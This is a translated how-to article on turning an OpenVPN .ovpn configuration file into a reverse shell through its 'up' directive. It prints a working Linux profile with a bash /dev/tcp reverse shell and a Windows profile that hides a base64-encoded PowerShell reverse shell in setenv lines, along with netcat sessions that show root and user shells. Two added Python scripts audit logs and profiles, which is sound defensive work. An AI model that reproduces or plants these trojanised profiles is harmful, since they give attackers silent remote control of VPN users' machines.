
How to create bounce Shell from OpenVPN configuration file to realize user system control

2025-04-03 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Many newcomers are unclear on how a reverse shell can be created from an OpenVPN configuration file to take control of a user's system. To help with that, the following article explains it in detail; anyone who needs it is welcome to read on, and we hope you find it useful.

Clue

While doing some basic research on OpenVPN, I came across an interesting question on the Stack Exchange forum:

The user is not asking whether using a free OpenVPN service is safe, but whether OpenVPN's own .ovpn configuration file is safe. Since the Stack Exchange thread ended without a satisfactory answer, I looked into it in depth and came to a surprising conclusion: yes, untrusted .ovpn files are very dangerous.

Test

Let's start from the beginning. The .ovpn file is the configuration file given to the OpenVPN client or server. It spells out everything about the VPN connection: the remote server to connect to, the password to use, the protocol to use, the user identity, and so on.

The simplest .ovpn file looks like this:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

This file tells the client to connect to the remote server at 192.168.1.245 with no authentication and no encryption, and to create a tun device for the connection (tun is the routed, point-to-point mode; tap is the alternative). The ifconfig line assigns the addresses on the tunnel: the client's tun address is 10.200.0.2 and the server's is 10.200.0.1, so 10.200.0.2 is the address of the local tun device. This three-line file is only a minimal example; .ovpn files in real deployments often run to hundreds of lines and contain many complex settings.

In this article we focus on the up directive of the OpenVPN configuration, which the official documentation describes as follows:

--up cmd: run the command cmd after the TUN/TAP device has been opened successfully.

cmd consists of the path of a script and zero or more arguments. The path and arguments can be quoted with single or double quotes or escaped with backslashes, and are separated by spaces. The up command is typically used to add routes, so that IP traffic destined for the private subnet at the other end of the VPN is routed through the tunnel.

In essence, the up directive executes whatever script you point it at. If the victim's Bash build supports /dev/tcp, it is easy to spawn a reverse shell on the victim's system. The following .ovpn file opens a reverse shell back to 192.168.1.218:8181.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&'"

When this .ovpn file is used, the user sees nothing obviously wrong: the VPN connection is established normally and traffic flows. Only two lines in the log below give it away, the NOTE about the --script-security setting and the line showing the up command being run (I had shown them in bold):

Thu Jun 7 12:28:23 2018 disabling NCP mode (--ncp-disable) because not in P2MP client or server mode
Thu Jun 7 12:28:23 2018 OpenVPN 2.5_git [git:HEAD/1f458322cdaffed0+*] x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [MH/PKTINFO] [AEAD] built on Jun 7 2018
Thu Jun 7 12:28:23 2018 library versions: OpenSSL 1.0.2g 1 Mar 2016, LZO 2.08
Thu Jun 7 12:28:23 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 * WARNING *: All encryption and authentication features disabled -- All data will be tunnelled as clear text and will not be protected against man-in-the-middle changes. PLEASE DO RECONSIDER THIS CONFIGURATION!
Thu Jun 7 12:28:23 2018 TUN/TAP device tun0 opened
Thu Jun 7 12:28:23 2018 do_ifconfig, tt->did_ifconfig_ipv6_setup=0
Thu Jun 7 12:28:23 2018 /sbin/ifconfig tun0 10.200.0.2 pointopoint 10.200.0.1 mtu 1500
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init
Thu Jun 7 12:28:23 2018 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.1.245:1194
Thu Jun 7 12:28:23 2018 UDP link local (bound): [AF_INET][undef]:1194
Thu Jun 7 12:28:23 2018 UDP link remote: [AF_INET]192.168.1.245:1194
Thu Jun 7 12:28:33 2018 Peer Connection Initiated with [AF_INET]192.168.1.245:1194
Thu Jun 7 12:28:34 2018 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Thu Jun 7 12:28:34 2018 Initialization Sequence Completed

Even if the user does notice these log entries, a reverse shell has already been established to our listener on 192.168.1.218:

albinolobster@ubuntu:~$ nc -lvp 8181
Listening on [0.0.0.0] (family 0, port 8181)
Connection from [192.168.1.247] port 8181 [tcp/*] accepted (family 2, sport 54836)
root@client:/home/client/openvpn# id
id
uid=0(root) gid=0(root) groups=0(root)
root@client:/home/client/openvpn#
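The two tell-tale log lines can be picked out mechanically rather than by eye. The following Python script is an added example for this article, not code from the original post or from OpenVPN: it parses OpenVPN's log line format, flags the --script-security NOTE and the cleartext WARNING, and raises an alert on any line that has the shape of an up/down hook invocation, that is, a command followed by the device name, the two MTUs, the two tunnel addresses and the init or restart context that OpenVPN appends when it runs the hook. The sample lines are constructed, modelled on the log above, with a placeholder hook command in place of the one in the article.

```python
"""Flag OpenVPN log lines that show a configuration running an external command.

Added example for this article; not part of the original post or of OpenVPN.
The sample log below is constructed (modelled on the log in the article).
"""
import re

# OpenVPN log lines start with a ctime-style timestamp: "Thu Jun  7 12:28:23 2018 <message>"
_TIMESTAMP = re.compile(r"^\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4} (?P<msg>.*)$")

# An up/down hook is logged as the command followed by the arguments OpenVPN appends:
#   <cmd> <dev> <tun_mtu> <link_mtu> <ifconfig_local> <ifconfig_remote> <init|restart>
_HOOK_RUN = re.compile(r"^(?P<cmd>.*?)\s+\S+\s+\d+\s+\d+\s+\S+\s+\S+\s+(init|restart)$")

# Substring rules for messages that deserve a second look before trusting the profile.
RULES = [
    ("script-security permits user-defined scripts",
     "script-security setting may allow this configuration to call user-defined scripts"),
    ("encryption and authentication disabled",
     "All encryption and authentication features disabled"),
]


def classify_line(line):
    """Return (severity, reason) for one log line, or None if it is unremarkable."""
    m = _TIMESTAMP.match(line)
    msg = m.group("msg") if m else line
    for reason, needle in RULES:
        if needle in msg:
            return ("warn", reason)
    hook = _HOOK_RUN.match(msg)
    if hook:
        return ("alert", "external command run by up/down hook: " + hook.group("cmd"))
    return None


def scan_log(lines):
    """Return [(line_no, severity, reason)] for every line worth reviewing."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify_line(line.rstrip("\n"))
        if verdict:
            hits.append((number, verdict[0], verdict[1]))
    return hits


# Constructed sample, modelled on the article's log; /tmp/hook.sh is a placeholder command.
SAMPLE_LOG = [
    "Thu Jun  7 12:28:23 2018 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts",
    "Thu Jun  7 12:28:23 2018 *WARNING*: All encryption and authentication features disabled -- All data will be tunnelled as clear text",
    "Thu Jun  7 12:28:23 2018 TUN/TAP device tun0 opened",
    "Thu Jun  7 12:28:23 2018 /sbin/ifconfig tun0 10.200.0.2 pointopoint 10.200.0.1 mtu 1500",
    "Thu Jun  7 12:28:23 2018 /bin/sh -c /tmp/hook.sh tun0 1500 1500 10.200.0.2 10.200.0.1 init",
    "Thu Jun  7 12:28:34 2018 Initialization Sequence Completed",
]

if __name__ == "__main__":
    for number, severity, reason in scan_log(SAMPLE_LOG):
        print(f"line {number}: [{severity}] {reason}")
```

The ifconfig line is deliberately not flagged: OpenVPN runs /sbin/ifconfig itself and does not append the hook arguments, so the structural pattern separates the daemon's own housekeeping from a command the profile asked for.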

Linux systems with Bash make this attack easy, but on a system such as Windows, which has no /dev/tcp, spawning a reverse shell takes more work.

Fortunately, Dave Kennedy of TrustedSec wrote a small PowerShell reverse shell that we can use. With the -EncodedCommand argument of powershell.exe we can pass the entire script on the command line, but first we must Base64-encode it to avoid escaping problems. My friend Carlos Perez has a script called ps_encoder.py that does this encoding.

That leaves one more problem: the encoded reverse-shell script is more than 4000 characters long, but OpenVPN limits an option line to 256 characters. To get around this, we split the script across several setenv directives and reassemble it in the up command. This gives the following .ovpn file:

ifconfig 10.200.0.2 10.200.0.1

dev tun

remote 192.168.1.245

script-security 2

setenv Z1 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe

Setenv A1 'ZgB1AG4AYwB0AGkAbwBuACAAYwBsAGUAYQBuAHUAcAAgAHsADQAKAGkAZgAgACgAJABjAGwAaQBlAG4AdAAuAEMAbwBuAG4AZQBjAHQAZQBkACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkAfQANAAoAaQBmACAAKAAkAHAAcgBvAGMAZQBzAHMALgBFAHgAaQB0AEM'

Setenv b1 'AbwBkAGUAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAkAHAAcgBvAGMAZQBzAHMALgBDAGwAbwBzAGUAKAApAH0ADQAKAGUAeABpAHQAfQANAAoAJABhAGQAZAByAGUAcwBzACAAPQAgACcAMQA5ADIALgAxADYAOAAuADEALgAyADEAOAAnAA0ACgAkAHAAbwByAHQAIAA9ACAAJwA4ADEAOAAxACcADQAKACQAYwBsAG'

Setenv C1 'kAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgBzAG8AYwBrAGUAdABzAC4AdABjAHAAYwBsAGkAZQBuAHQADQAKACQAYwBsAGkAZQBuAHQALgBjAG8AbgBuAGUAYwB0ACgAJABhAGQAZAByAGUAcwBzACwAJABwAG8AcgB0ACkADQAKACQAcwB0AHIAZQBhAG0AIAA9A'

Setenv D1 'CAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQANAAoAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAJABjAGwAaQBlAG4AdAAuAFIAZQBjAGUAaQB2AGUAQgB1AGYAZgBlAHIAUwBpAHoAZQAN'

Setenv E1 'AAoAJABwAHIAbwBjAGUAcwBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMADQAKACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAHIAdABJAG4AZgBvAC4ARgBpAGwAZQBOAGEAbQBlACAAPQAgACcAQwA6AFwAXAB3AGkAbgB'

Setenv F1 'kAG8AdwBzAFwAXABzAHkAcwB0AGUAbQAzADIAXABcAGMAbQBkAC4AZQB4AGUAJwANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAEkAbgBwAHUAdAAgAD0AIAAxAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQASQBuAGYAbw'

Setenv G1 'AuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAIAA9ACAAMQANAAoAJABwAHIAbwBjAGUAcwBzAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAgAD0AIAAwAA0ACgAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQByAHQAKAApAA0ACgAkAGkAb'

Setenv H2 'gBwAHUAdABzAHQAcgBlAGEAbQAgAD0AIAAkAHAAcgBvAGMAZQBzAHMALgBTAHQAYQBuAGQAYQByAGQASQBuAHAAdQB0AA0ACgAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtACAAPQAgACQAcAByAG8AYwBlAHMAcwAuAFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAA'

Setenv i1 'MQANAAoAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcADQAKAHcAaABpAGwAZQAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBQAGUAZQBrACgAKQAgAC0AbgBlACAALQAxACkAewAkAG8'

Setenv J1 'AdQB0ACAAKwA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsAD'

Setenv K1 'AALAAkAG8AdQB0AC4ATABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZABvAG4AZQAgAD0AIAAkAGYAYQBsAHMAZQA7ACAAJAB0AGUAcwB0AGkAbgBnACAAPQAgADAAOwANAAoAdwBoAGkAbABlACAAKAAtAG4AbwB0ACAAJABkAG8AbgBlACkAIAB7AA0ACgBpAGYAIAAoACQAYwBsA'

Setenv L1 'GkAZQBuAHQALgBDAG8AbgBuAGUAYwB0AGUAZAAgAC0AbgBlACAAJAB0AHIAdQBlACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAJABwAG8AcwAgAD0AIAAwADsAIAAkAGkAIAA9ACAAMQANAAoAdwBoAGkAbABlACAAKAAoACQAaQAgAC0AZwB0ACAAMAApACAALQBhAG4AZAAgACgAJABwAG8AcwAgAC0AbAB0ACAAJABu'

Setenv M1 'AGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByAC4ATABlAG4AZwB0AGgAKQApACAAewANAAoAJAByAGUAYQBkACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABuAGUAdAB3AG8AcgBrAGIAdQBmAGYAZQByACwAJABwAG8AcwAsACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACAALQA'

Setenv N1 'gACQAcABvAHMAKQANAAoAJABwAG8AcwArAD0AJAByAGUAYQBkADsAIABpAGYAIAAoACQAcABvAHMAIAAtAGEAbgBkACAAKAAkAG4AZQB0AHcAbwByAGsAYgB1AGYAZgBlAHIAWwAwAC4ALgAkACgAJABwAG8AcwAtADEAKQBdACAALQBjAG8AbgB0AGEAaQBuAHMAIAAxADAAKQApACAAewBiAHIAZQBhAGsAfQB9AA0ACg'

Setenv o1 'BpAGYAIAAoACQAcABvAHMAIAAtAGcAdAAgADAAKQAgAHsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABlAG4AYwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbgBlAHQAdwBvAHIAawBiAHUAZgBmAGUAcgAsADAALAAkAHAAbwBzACkADQAKACQAaQBuAHAAdQB0AHMAdAByAGUAYQBtAC4AdwByAGkAd'

Setenv p1 'ABlACgAJABzAHQAcgBpAG4AZwApAA0ACgBzAHQAYQByAHQALQBzAGwAZQBlAHAAIAAxAA0ACgBpAGYAIAAoACQAcAByAG8AYwBlAHMAcwAuAEUAeABpAHQAQwBvAGQAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AGMAbABlAGEAbgB1AHAAfQANAAoAZQBsAHMAZQAgAHsADQAKACQAbwB1AHQAIAA9ACAAJABlAG4A'

Setenv Q1 'YwBvAGQAaQBuAGcALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAcAB1AHQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAKQApAA0ACgB3AGgAaQBsAGUAKAAkAG8AdQB0AHAAdQB0AHMAdAByAGUAYQBtAC4AUABlAGUAawAoACkAIAAtAG4AZQAgAC0AMQApAHsADQAKACQAbwB1AHQAIAArAD0AIAAkAGUAbgBjAG8'

Setenv R1 'AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAHUAdABwAHUAdABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAApACkAOwAgAGkAZgAgACgAJABvAHUAdAAgAC0AZQBxACAAJABzAHQAcgBpAG4AZwApACAAewAkAG8AdQB0ACAAPQAgACcAJwB9AH0ADQAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAG'

Setenv S1 'UAbgBjAG8AZABpAG4AZwAuAEcAZQB0AEIAeQB0AGUAcwAoACQAbwB1AHQAKQAsADAALAAkAG8AdQB0AC4AbABlAG4AZwB0AGgAKQANAAoAJABvAHUAdAAgAD0AIAAkAG4AdQBsAGwADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJABuAHUAbABsAH0AfQAgAGUAbABzAGUAIAB7AGMAbABlAGEAbgB1AHAAfQB9AA=='

up 'C:\\Windows\\System32\\cmd.exe /c (start %Z1% -WindowStyle Hidden -EncodedCommand %A1%%b1%%C1%%D1%%E1%%F1%%G1%%H2%%i1%%J1%%K1%%L1%%M1%%N1%%o1%%p1%%Q1%%R1%%S1%) ||'
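A defender who receives a profile like this wants to know, before importing it, exactly what it would execute. The following Python audit script is an added example for this article; it is not OpenVPN's code and not the original post's code. It lists every directive that makes OpenVPN run an external program (the article discusses only up; the other names in the list are the remaining script hooks from the OpenVPN manual, so the check is broader than the page's single case) and expands %var% and $var references against the profile's own setenv lines, so that a command assembled from fragments is shown whole. It assumes that Python's shlex quoting rules are a close enough approximation of OpenVPN's own option parser. The sample profile is constructed; its setenv fragments are placeholders, not the article's payload.

```python
"""Audit an OpenVPN .ovpn profile for directives that run external commands.

Added example for this article; not OpenVPN's code and not the original post's code.
Assumption: shlex quoting approximates OpenVPN's config parser well enough for auditing.
"""
import re
import shlex

# Directives that cause OpenVPN to run an external program (OpenVPN manual).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address",
}

# %NAME% (cmd.exe style) or $NAME (POSIX shell style) variable references.
_VAR_REF = re.compile(r"%(\w+)%|\$(\w+)")


def parse_profile(text):
    """Yield (directive, args) pairs; directives lower-cased, comments and blanks skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        try:
            parts = shlex.split(line)   # honours single/double quotes and backslashes
        except ValueError:
            parts = line.split()        # unbalanced quotes: fall back to whitespace split
        if parts:
            yield parts[0].lower(), parts[1:]


def expand_setenv(value, env):
    """Replace variable references with setenv values.

    cmd.exe expands %var% case-insensitively, so the lookup is case-insensitive.
    Unknown names are left as-is so they stay visible in the report.
    """
    lowered = {name.lower(): val for name, val in env.items()}

    def substitute(match):
        name = match.group(1) or match.group(2)
        return lowered.get(name.lower(), match.group(0))

    return _VAR_REF.sub(substitute, value)


def audit_profile(text):
    """Return the script-security level, setenv count and every script directive found."""
    entries = list(parse_profile(text))
    env = {a[0]: " ".join(a[1:]) for d, a in entries if d == "setenv" and len(a) >= 2}
    script_security = None
    findings = []
    for directive, args in entries:
        if directive == "script-security" and args:
            script_security = args[0]
        elif directive in SCRIPT_DIRECTIVES:
            raw = " ".join(args)
            expanded = expand_setenv(raw, env)
            findings.append({"directive": directive, "raw": raw,
                             "expanded": expanded, "uses_setenv": expanded != raw})
    return {"script_security": script_security, "setenv_count": len(env),
            "findings": findings}


def safe_to_import(report):
    """A profile from an untrusted source should run no external command at all."""
    return not report["findings"]


# Constructed sample, modelled on the Windows profile in the article; AAAA/BBBB are placeholders.
SAMPLE_PROFILE = r"""
# constructed sample profile
remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
setenv Z1 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
setenv a1 'AAAA'
setenv b1 'BBBB'
up 'C:\\Windows\\System32\\cmd.exe /c (start %z1% -WindowStyle Hidden -EncodedCommand %a1%%b1%) ||'
"""

if __name__ == "__main__":
    report = audit_profile(SAMPLE_PROFILE)
    print("script-security:", report["script_security"], "| setenv lines:", report["setenv_count"])
    for finding in report["findings"]:
        print(f"{finding['directive']}: {finding['expanded']}")
    print("safe to import:", safe_to_import(report))
```

Run against the sample, the report shows the single up directive with the PowerShell path and the concatenated -EncodedCommand argument substituted in, which is the form a reviewer actually needs to see; the raw line alone, with its string of %a1%%b1% references, hides it. Any hit at all is enough to reject a profile from an untrusted source, whatever script-security says.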

As you can see, the encoded script is split across multiple setenv lines and then concatenated from those environment variables when the up command runs. But just as in our Linux example, the OpenVPN GUI shows a note about script security when the configuration is started for the first time:

Again, even if the user notices it and understands what it means, it is already too late: the shell has connected:

albinolobster@ubuntu:~$ nc -lvp 8181
Listening on [0.0.0.0] (family 0, port 8181)
Connection from [192.168.1.226] port 8181 [tcp/*] accepted (family 2, sport 51082)
Microsoft Windows [Version 10.0.17134.48]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\albinolobster\OpenVPN\config\albino_lobster>whoami
desktop-r5u6pvd\albinolobster
C:\Users\albinolobster\OpenVPN\config\albino_lobster>
